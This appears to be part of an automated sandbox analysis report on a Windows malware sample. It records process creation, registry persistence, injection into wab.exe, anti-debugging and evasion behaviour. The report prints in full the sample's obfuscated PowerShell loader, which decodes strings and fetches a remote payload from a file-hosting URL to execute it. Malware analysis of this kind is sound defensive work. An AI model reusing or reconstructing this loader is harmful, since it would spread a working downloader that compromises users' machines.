        Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007489000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007390000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdb source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.1913857979.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdbGCTL source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: stem.Core.pdbS] source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnter", "0")
        Source: Yara match File source: 00000005.00000002.1925873390.00000000091BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.1925751155.0000000008790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.1919062447.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Daarekisten113)$global:Culturology = [System.Text.Encoding]::ASCII.GetString($Analogies)$global:Spermatozoic=$Culturology.substring(328933,28828)<#Vendable Magnetoplasmadynamics Ghai
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fastlandssoklerne235 $Nbenes $Grundfladernes), (Aperitiffer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trihedra = [AppDomain]::CurrentDomain.GetAssemb
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afficerendes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Februaraften, $false).DefineType($udblokke,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Daarekisten113)$global:Culturology = [System.Text.Encoding]::ASCII.GetString($Analogies)$global:Spermatozoic=$Culturology.substring(328933,28828)<#Vendable Magnetoplasmadynamics Ghai
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. 
VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. 
VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886F171C8 push esp; retf 2_2_00007FF886F171C9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00FCD632 pushfd ; ret 5_2_00FCD641
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07650638 push eax; mov dword ptr [esp], ecx5_2_07650AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07650AB8 push eax; mov dword ptr [esp], ecx5_2_07650AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E28CD push ebx; ret 5_2_084E2B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E2A6C push ebx; ret 5_2_084E2B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E0230 pushfd ; ret 5_2_084E0235
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E2AF3 push ebx; ret 5_2_084E2B32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C09AD push ecx; mov dword ptr [esp], ecx12_2_246C09B6
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2528 push ss; retf 16_2_058C2557
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C94A4 push edx; ret 16_2_058C94A5
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BC7B2 push edi; ret 16_2_058BC7B3
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2F5C pushad ; retf 16_2_058C2F77
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2EF6 pushad ; retf 16_2_058C2F77
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2E10 push ecx; iretd 16_2_058C2EBA
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BC1B4 push ecx; iretd 16_2_058BC1B5
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C294B push edx; iretd 16_2_058C2952
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C4974 push ds; retn 03BDh16_2_058C497A
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058CE00D push 54F79CCFh; retf 16_2_058CE012
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B7809 pushad ; ret 16_2_058B7836
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B33B0 push edx; retf 16_2_058B33B2
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B7BCD push edx; retf 16_2_058B7BCE
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C931D push edi; ret 16_2_058C932D
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B2321 push edi; ret 16_2_058B2331
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C8B4D push edi; retf 16_2_058C8B5C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C8B50 push edi; retf 16_2_058C8B5C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B22F6 push edi; ret 16_2_058B2331
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C324B push ebx; ret 16_2_058C325B
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B226C push edx; iretd 16_2_058B226D
        Source: C:\Windows\SysWOW64\replace.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YDN4C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\replace.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246EBD30 rdtscp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4487
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5386
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8424
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1321
        Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.3 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep count: 8424 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764 Thread sleep count: 1321 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\replace.exe Last function: Thread delayed
        Source: wscript.exe, 00000000.00000003.1312114499.000001AAA32F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\ig
        Source: wab.exe, 0000000C.00000003.2155735479.0000000008A0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000002.00000002.2359893291.000002B3501AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247035C0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2479547F mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C1460 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246DF460 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246EA470 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2477F453 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246CB440 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FE443 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246E245A mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246BE420 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246BC427 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FA430 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246E340D mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F8402 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C04E5 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247694E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247954DB mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2474A4B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C64AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F34B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F44B0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C9486 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246BB480 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F656A mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246BB562 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FB570 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C8550 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_24795537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246EE53E mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2476F525 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246D0535 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2477B52F mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246CD534 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FD530 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F7505 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F7505 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_24794500 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FC5ED mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C25E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FE5CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247935D7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F55C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247955C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246E95DA mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C65D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FA5D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246E15A9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2477F5BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247535BA mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_247405A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246E45B1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2474B594 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246B758F mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F4588 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C2582 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246C2582 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FE59C mov eax, dword ptr fs:[00000030h]
